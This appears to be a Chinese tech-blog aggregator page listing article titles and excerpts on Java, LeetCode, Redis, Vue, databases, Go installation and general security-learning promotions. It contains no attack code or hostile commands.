    基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客(网络安全)学习
  • Java进阶篇之Lambda表达式 code2cat JavaJava进阶开发语言javaideintellij-ideaideamyeclipse
    引言在前面的文章中,我们介绍了线程池(Java进阶篇之线程池)。你是不是经常遇到需要写大量匿名内部类的情况?比如,我们在使用Java的集合、事件监听器、或者某些框架时,常常需要实现接口中的单一方法。传统的方式往往会导致代码冗长,影响可读性。而Lambda表达式的出现,正是为了简化这些重复的代码,让我们能够以更加简洁、优雅的方式表达操作。今天,我们将深入探讨Java中的Lambda表达式,看看它如何
  • 【Python爬虫(15)】从0到1:Python爬虫实战攻克电商网站动态数据堡垒 奔跑吧邓邓子 Python爬虫python爬虫开发语言电商网站动态数据
    【Python爬虫】专栏简介:本专栏是Python爬虫领域的集大成之作,共100章节。从Python基础语法、爬虫入门知识讲起,深入探讨反爬虫、多线程、分布式等进阶技术。以大量实例为支撑,覆盖网页、图片、音频等各类数据爬取,还涉及数据处理与分析。无论是新手小白还是进阶开发者,都能从中汲取知识,助力掌握爬虫核心技能,开拓技术视野。目录一、引言二、准备工作2.1环境搭建2.2目标电商网站分析三、攻克登
  • Redis:深入理解阻塞列表弹出与消息发布订阅机制_brpop原理 高级工程师2024 2024年程序员学习redisbootstrap数据库
    先自我介绍一下,小编浙江大学毕业,去过华为、字节跳动等大厂,目前阿里P7深知大多数程序员,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年最新Linux运维全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶
  • 力扣第十九题-删除链表的倒数第 N 个结点 Coding&Sharing 力扣刷题leetcode单链表链表指针
    前言力扣第十九题删除链表的倒数第N个结点如下所示:给你一个链表,删除链表的倒数第n个结点,并且返回链表的头结点。进阶:你能尝试使用一趟扫描实现吗?示例1:输入:head=[1,2,3,4,5],n=2输出:[1,2,3,5]示例2:输入:head=[1],n=1输出:[]示例3:输入:head=[1,2],n=1输出:[1]一、思路这一题很直观的想法,先遍历一遍链表然后并记录下链表的总个数,然后再
  • 【LeetCode】第19题——删除链表的倒数第 N 个结点(难度:中等) Se7en_Dayz LeetCode题解leetcodejava双指针
    【LeetCode】第19题——删除链表的倒数第N个结点(难度:中等)题目描述解题思路代码详解注意点题目描述给你一个链表,删除链表的倒数第n个结点,并且返回链表的头结点。进阶:你能尝试使用一趟扫描实现吗?示例1:输入:head=[1,2,3,4,5],n=2输出:[1,2,3,5]示例2:输入:head=[1],n=1输出:[]示例3:输入:head=[1,2],n=1输出:[1]提示:链表中结点
  • Vue 3 Composition API进阶指南 前端学步 Vue3技术分享专栏vue.jsjavascript前端
    在上一篇文章中,我们介绍了Vue3的CompositionAPI基础,包括如何使用setup函数、ref和reactive来创建响应式数据,以及使用watchEffect来监控数据变化。本文将继续深入探讨CompositionAPI的高级用法,帮助你更好地理解和利用Vue3的新特性。组合多个Hooks在实际开发中,我们经常需要组合使用多个自定义的Hooks来实现复杂的功能。Vue3的Composi
  • 【Java进阶篇】——第11篇:Java 8 新特性及使用 猿享天开 Java开发从入门到精通java开发语言
    第11篇:Java8新特性及使用Java8是一次里程碑式的更新,引入了多项革新特性,极大地提升了开发效率和代码表现力。本文将从Lambda表达式、StreamAPI、时间日期API、Optional类等核心特性出发,结合实战场景和最佳实践,全面解析Java8的核心功能。1.Lambda表达式与函数式编程1.1Lambda表达式基础Lambda表达式允许以简洁的语法实现函数式接口(仅含一个抽象方法的
  • 学习笔记分享-快速掌握前端-html进阶(利用telnet发送json请求、利用telnet发送multipart请求) 2301_81243975 前端学习笔记
    前言图片上面的personal表示只有图片上面的一行语句是解释图片内容的、local表示这个图片所在标题下的所有语句都是解释图片内容的、global表示有多个标题下的所有语句都是解释图片内容的我是一名大二的学生,学了差不多一年java技术栈了,想记录一下自己对知识点的心得,目前还是个小白,期望大佬们可以指出我笔记中的不足之处、对知识点的认知错误、笔记结构的混乱等这些图片内容都是在观看黑马课程时的视
  • C++内存操纵的十二维解构艺术 王强你强 编程技术c++java开发语言
    在C++的混沌宇宙中,指针是打开时空裂缝的密钥。本文将以全新视角解构指针的本质,揭示从堆栈穿梭到多维空间映射的进阶技法,展示现代C++赋予指针的惊人可能性。一、指针本体论:内存的波粒二象性所有指针变量都是量子化的存在,既指向具体内存位置,又携带类型信息波。通过类型系统实验可验证其双重属性:templatevoidquantum_observer(T*ptr){std::cout(ptr)(&c)v
  • 【云原生进阶之数据库技术】第四章-GaussDB-关键技术-2.4.1-GaussDB存储引擎层关键技术方案 江中散人 云原生进阶-数据库专栏云原生进阶-PaaS专栏后台开发专栏数据库云原生gaussdbdatabase存储引擎
    1存储引擎概览早期计算机程序通过文件系统管理数据,到了20世纪60年代这种方式就开始不能满足数据管理要求了,用户逐渐对数据并发写入的完整性、高效的检索提出更高的要求。由于机械磁盘的随机读写性能问题,从20世纪80年代开始,大多数数据库一直围绕着减少随机读写磁盘进行设计。主要思路是把对数据页面的随机写盘转化为对WAL(WriteAheadLog,预写式日志)的顺序写盘,WAL持久化完成,事务就算提交
  • HarmonyOS开发宝典震撼来袭,卓越应用开发之旅一触即发,轻松启程! harmonyos
    HarmonyOS赋能产品,全面护航开发者从HarmonyOS感知、学习进阶、开发实践至技术支持的全旅程,助力开发者高效开发!我们倾心打造了一个涵盖高频场景的最佳实践案例库,汇聚丰富实战经验,旨在大幅提升开发效率。此外,我们还提供场景化的开箱即用代码示例,让应用开发触手可及,轻松高效。更令人振奋的是,全新升级的《HarmonyOS第一课》现已震撼上线!该课程采用多维融合教学法,将直观代码讲解与即学
  • PyInstaller在Linux环境下的打包艺术 黑金IT pythonlinux运维服务器
    PyInstaller是一款强大的工具,能够将Python应用程序及其所有依赖项打包成独立的可执行文件,支持Windows、macOS和Linux等多个平台。在Linux环境下,PyInstaller打包的可执行文件具有独特的特点和优势。本文将详细介绍PyInstaller在Linux环境下的应用,包括安装、准备项目、打包过程、打包后的可执行文件、常见问题与解决方法、进阶技巧、案例分析以及总结与展
  • 用C/C++手搓链表:从青铜到王者的进阶之路 暮乘白帝过重山 c语言c++链表开发语言区块链算法数据结构
    链表就像程序员的"俄罗斯套娃"——每个娃娃肚子里都藏着下一个娃娃的线索。今天我们将用纯手搓代码和灵魂比喻,带你彻底征服这个数据结构!一、链表的本质:程序员的"贪吃蛇"1.1核心结构解剖节点(Node)=贪吃蛇的关节数据域:当前关节吃的食物指针域:下一截蛇身的位置坐标头指针(Head)=蛇头GPS定位器尾节点(Tail)=蛇尾(指向NULL表示结束)1.2类型选择指南类型内存消耗适用场景经典案例单向
  • 《On Java进阶卷》阅读笔记(二) m0_74823317 面试学习路线阿里巴巴java笔记python
    第3章集合主题List的行为:List是除数组之外最基本的对象存储和检索方式,基本操作如下:add()用于插入元素get()用于随机访问元素,这个操作在特定的List的实现成本不同iterator()用于返回该序列上的iteratorstream()用于生成序列中元素的StreamSet的行为:Set的意义在于测试成员身份,也可以用于删除重复元素。HashSet的输出是没有明显的顺序TreeSet
  • 从零开始入门 K8s | Kubernetes 网络模型进阶 jishulaozhuanjia
    个人博客导航页(点击右侧链接即可打开个人博客):互联网老兵带你入门技术栈本文整理自《CNCFxAlibaba云原生技术公开课》第25讲,点击直达课程页面。关注“阿里巴巴云原生”公众号,回复关键词**“入门”**,即可下载从零入门K8s系列文章PPT。导读:本文将基于之前介绍的基本网络模型,进行更深入的一些了解,希望给予读者一个更广更深的认知。首先简单回顾一下容器网络的历史沿革,剖析一下Kubern
  • 【合集】Java进阶——Java深入学习的笔记汇总 & 再论面向对象、数据结构和算法、JVM底层、多线程、类加载、 web_15534274656 面试学习路线阿里巴巴java学习笔记
    前言spring作为主流的JavaWeb开发的开源框架,是Java世界最为成功的框架,持续不断深入认识spring框架是Java程序员不变的追求;而spring的底层其实就是Java,因此,深入学习Spring和深入学习Java是硬币的正反面,两者相辅相成,相互促进。本篇博客是一篇不定期持续更新的博客,是一些Java深入学习的笔记汇总。目录前言面向对象专题再论面向对象封装和关键字private,t
  • 2025年——【寒假】自学黑客计划(网络安全) 网安CILLE web安全网络安全网络安全linux
    CSDN大礼包:基于入门网络安全/黑客打造的:黑客&网络安全入门&进阶学习资源包前言什么是网络安全网络安全可以基于攻击和防御视角来分类,我们经常听到的“红队”、“渗透测试”等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。如何成为一名黑客很多朋友在学习安全方面都会半路转行,因为不知如何去学,在这里,我将这个整份答案分为黑客(网络安全)入门必备、黑客(网络安全)职业指南、黑客
  • DeepSeek进阶开发与应用1:DeepSeek框架概述与基础应用 Evaporator Core #DeepSeek快速入门DeepSeek进阶开发与应用spring自然语言处理
    引言在当今的人工智能领域,深度学习技术已经成为了推动技术进步的核心动力之一。DeepSeek作为一个先进的深度学习框架,旨在为开发者和研究人员提供一个高效、灵活且易于扩展的平台,以便于他们能够快速地实现和部署各种深度学习模型。本文将深入探讨DeepSeek框架的核心架构、基础应用以及如何通过代码实现一个简单的深度学习模型。DeepSeek框架概述DeepSeek框架的设计理念是简洁而强大。它提供了
  • web前段跨域nginx代理配置 刘正强 nginxcmsWeb
    nginx代理配置可参考server部分 server {         listen       80;         server_name  localhost;
  • spring学习笔记 caoyong spring
    一、概述     a>、核心技术 : IOC与AOP b>、开发为什么需要面向接口而不是实现     接口降低一个组件与整个系统的藕合程度,当该组件不满足系统需求时,可以很容易的将该组件从系统中替换掉,而不会对整个系统产生大的影响 c>、面向接口编口编程的难点在于如何对接口进行初始化,(使用工厂设计模式)
  • Eclipse打开workspace提示工作空间不可用 0624chenhong eclipse
    做项目的时候,难免会用到整个团队的代码,或者上一任同事创建的workspace, 1.电脑切换账号后,Eclipse打开时,会提示Eclipse对应的目录锁定,无法访问,根据提示,找到对应目录,G:\eclipse\configuration\org.eclipse.osgi\.manager,其中文件.fileTableLock提示被锁定。 解决办法,删掉.fileTableLock文件,重
  • Javascript 面向对面写法的必要性? 一炮送你回车库 JavaScript
    现在Javascript面向对象的方式来写页面很流行,什么纯javascript的mvc框架都出来了:ember 这是javascript层的mvc框架哦,不是j2ee的mvc框架   我想说的是,javascript本来就不是一门面向对象的语言,用它写出来的面向对象的程序,本身就有些别扭,很多人提到js的面向对象首先提的是:复用性。那么我请问你写的js里有多少是可以复用的,用fu
  • js array对象的迭代方法 换个号韩国红果果 array
    1.forEach 该方法接受一个函数作为参数, 对数组中的每个元素 使用该函数  return 语句失效 function square(num) { print(num, num * num); } var nums = [1,2,3,4,5,6,7,8,9,10]; nums.forEach(square); 2.every 该方法接受一个返回值为布尔类型
  • 对Hibernate缓存机制的理解 归来朝歌 session一级缓存对象持久化
    在hibernate中session一级缓存机制中,有这么一种情况: 问题描述:我需要new一个对象,对它的几个字段赋值,但是有一些属性并没有进行赋值,然后调用 session.save()方法,在提交事务后,会出现这样的情况: 1:在数据库中有默认属性的字段的值为空 2:既然是持久化对象,为什么在最后对象拿不到默认属性的值? 通过调试后解决方案如下: 对于问题一,如你在数据库里设置了
  • WebService调用错误合集 darkranger webservice
     Java.Lang.NoClassDefFoundError: Org/Apache/Commons/Discovery/Tools/DiscoverSingleton 调用接口出错, 一个简单的WebService import org.apache.axis.client.Call;import org.apache.axis.client.Service; 首先必不可
  • JSP和Servlet的中文乱码处理 aijuans Java Web
    JSP和Servlet的中文乱码处理 前几天学习了JSP和Servlet中有关中文乱码的一些问题,写成了博客,今天进行更新一下。应该是可以解决日常的乱码问题了。现在作以下总结希望对需要的人有所帮助。我也是刚学,所以有不足之处希望谅解。 一、表单提交时出现乱码: 在进行表单提交的时候,经常提交一些中文,自然就避免不了出现中文乱码的情况,对于表单来说有两种提交方式:get和post提交方式。所以
  • 面试经典六问 atongyeye 工作面试
    题记:因为我不善沟通,所以在面试中经常碰壁,看了网上太多面试宝典,基本上不太靠谱。只好自己总结,并试着根据最近工作情况完成个人答案。以备不时之需。 以下是人事了解应聘者情况的最典型的六个问题: 1 简单自我介绍 关于这个问题,主要为了弄清两件事,一是了解应聘者的背景,二是应聘者将这些背景信息组织成合适语言的能力。 我的回答:(针对技术面试回答,如果是人事面试,可以就掌
  • contentResolver.query()参数详解 百合不是茶 androidquery()详解
    收藏csdn的博客,介绍的比较详细,新手值得一看 1.获取联系人姓名 一个简单的例子,这个函数获取设备上所有的联系人ID和联系人NAME。 [java]  view plain copy   public void fetchAllContacts() {      
  • ora-00054:resource busy and acquire with nowait specified解决方法 bijian1013 oracle数据库killnowait
            当某个数据库用户在数据库中插入、更新、删除一个表的数据,或者增加一个表的主键时或者表的索引时,常常会出现ora-00054:resource busy and acquire with nowait specified这样的错误。主要是因为有事务正在执行(或者事务已经被锁),所有导致执行不成功。 1.下面的语句
  • web 开发乱码 征客丶 springWeb
    以下前端都是 utf-8 字符集编码 一、后台接收 1.1、 get 请求乱码 get 请求中,请求参数在请求头中; 乱码解决方法: a、通过在web 服务器中配置编码格式:tomcat 中,在 Connector 中添加URIEncoding="UTF-8"; 1.2、post 请求乱码 post 请求中,请求参数分两部份, 1.2.1、url?参数,
  • 【Spark十六】: Spark SQL第二部分数据源和注册表的几种方式 bit1129 spark
    Spark SQL数据源和表的Schema case class apply schema parquet json JSON数据源 准备源数据 {"name":"Jack", "age": 12, "addr":{"city":"beijing&
  • JVM学习之:调优总结 -Xms -Xmx -Xmn -Xss BlueSkator -Xss-Xmn-Xms-Xmx
      堆大小设置JVM 中最大堆大小有三方面限制:相关操作系统的数据模型(32-bt还是64-bit)限制;系统的可用虚拟内存限制;系统的可用物理内存限制。32位系统下,一般限制在1.5G~2G;64为操作系统对内存无限制。我在Windows Server 2003 系统,3.5G物理内存,JDK5.0下测试,最大可设置为1478m。典型设置: java -Xmx355
  • jqGrid 各种参数 详解(转帖) BreakingBad jqGrid
      jqGrid 各种参数 详解 分类:  源代码分享  个人随笔请勿参考  解决开发问题 2012-05-09 20:29   84282人阅读   评论(22)   收藏   举报 jquery 服务器 parameters function ajax string  
  • 读《研磨设计模式》-代码笔记-代理模式-Proxy bylijinnan java设计模式
    声明: 本文只为方便我个人查阅和理解,详细的分析以及源代码请移步 原作者的博客http://chjavach.iteye.com/ import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method; import java.lang.reflect.Proxy; /* * 下面
  • 应用升级iOS8中遇到的一些问题 chenhbc ios8升级iOS8
    1、很奇怪的问题,登录界面,有一个判断,如果不存在某个值,则跳转到设置界面,ios8之前的系统都可以正常跳转,iOS8中代码已经执行到下一个界面了,但界面并没有跳转过去,而且这个值如果设置过的话,也是可以正常跳转过去的,这个问题纠结了两天多,之前的判断我是在 -(void)viewWillAppear:(BOOL)animated  中写的,最终的解决办法是把判断写在 -(void
  • 工作流与自组织的关系? comsci 设计模式工作
      目前的工作流系统中的节点及其相互之间的连接是事先根据管理的实际需要而绘制好的,这种固定的模式在实际的运用中会受到很多限制,特别是节点之间的依存关系是固定的,节点的处理不考虑到流程整体的运行情况,细节和整体间的关系是脱节的,那么我们提出一个新的观点,一个流程是否可以通过节点的自组织运动来自动生成呢?这种流程有什么实际意义呢?   这里有篇论文,摘要是:“针对网格中的服务
  • Oracle11.2新特性之INSERT提示IGNORE_ROW_ON_DUPKEY_INDEX daizj oracle
    insert提示IGNORE_ROW_ON_DUPKEY_INDEX 转自:http://space.itpub.net/18922393/viewspace-752123 在 insert into tablea ...select * from tableb中,如果存在唯一约束,会导致整个insert操作失败。使用IGNORE_ROW_ON_DUPKEY_INDEX提示,会忽略唯一
  • 二叉树:堆 dieslrae 二叉树
        这里说的堆其实是一个完全二叉树,每个节点都不小于自己的子节点,不要跟jvm的堆搞混了.由于是完全二叉树,可以用数组来构建.用数组构建树的规则很简单:     一个节点的父节点下标为: (当前下标 - 1)/2     一个节点的左节点下标为: 当前下标 * 2 + 1   &
  • C语言学习八结构体 dcj3sjt126com c
    为什么需要结构体,看代码 # include <stdio.h> struct Student //定义一个学生类型,里面有age, score, sex, 然后可以定义这个类型的变量 { int age; float score; char sex; } int main(void) { struct Student st = {80, 66.6,
  • centos安装golang dcj3sjt126com centos
    #在国内镜像下载二进制包 wget -c  http://www.golangtc.com/static/go/go1.4.1.linux-amd64.tar.gz tar -C /usr/local -xzf go1.4.1.linux-amd64.tar.gz   #把golang的bin目录加入全局环境变量 cat >>/etc/profile<
  • 10.性能优化-监控-MySQL慢查询 frank1234 性能优化MySQL慢查询
    1.记录慢查询配置 show variables where variable_name like 'slow%' ; --查看默认日志路径 查询结果:--不用的机器可能不同 slow_query_log_file=/var/lib/mysql/centos-slow.log 修改mysqld配置文件:/usr /my.cnf[一般在/etc/my.cnf,本机在/user/my.cn
  • Java父类取得子类类名 happyqing javathis父类子类类名
      在继承关系中,不管父类还是子类,这些类里面的this都代表了最终new出来的那个类的实例对象,所以在父类中你可以用this获取到子类的信息!   package com.urthinker.module.test; import org.junit.Test; abstract class BaseDao<T> { public void
  • Spring3.2新注解@ControllerAdvice jinnianshilongnian @Controller
    @ControllerAdvice,是spring3.2提供的新注解,从名字上可以看出大体意思是控制器增强。让我们先看看@ControllerAdvice的实现:   @Target(ElementType.TYPE) @Retention(RetentionPolicy.RUNTIME) @Documented @Component public @interface Co
  • Java spring mvc多数据源配置 liuxihope spring
    转自:http://www.itpub.net/thread-1906608-1-1.html 1、首先配置两个数据库 <bean id="dataSourceA" class="org.apache.commons.dbcp.BasicDataSource" destroy-method="close&quo
  • 第12章 Ajax(下) onestopweb Ajax
    index.html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/
  • BW / Universe Mappings blueoxygen BO
      BW Element OLAP Universe Element Cube  Dimension Class Charateristic A class with dimension and detail objects (Detail objects for key and desription) Hi
  • Java开发熟手该当心的11个错误 tomcat_oracle java多线程工作单元测试
    #1、不在属性文件或XML文件中外化配置属性。比如,没有把批处理使用的线程数设置成可在属性文件中配置。你的批处理程序无论在DEV环境中,还是UAT(用户验收 测试)环境中,都可以顺畅无阻地运行,但是一旦部署在PROD 上,把它作为多线程程序处理更大的数据集时,就会抛出IOException,原因可能是JDBC驱动版本不同,也可能是#2中讨论的问题。如果线程数目 可以在属性文件中配置,那么使它成为
  • 推行国产操作系统的优劣 yananay windowslinux国产操作系统
    最近刮起了一股风,就是去“国外货”。从应用程序开始,到基础的系统,数据库,现在已经刮到操作系统了。原因就是“棱镜计划”,使我们终于认识到了国外货的危害,开始重视起了信息安全。操作系统是计算机的灵魂。既然是灵魂,为了信息安全,那我们就自然要使用和推行国货。可是,一味地推行,是否就一定正确呢? 先说说信息安全。其实从很早以来大家就在讨论信息安全。很多年以前,就据传某世界级的网络设备制造商生产的交
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他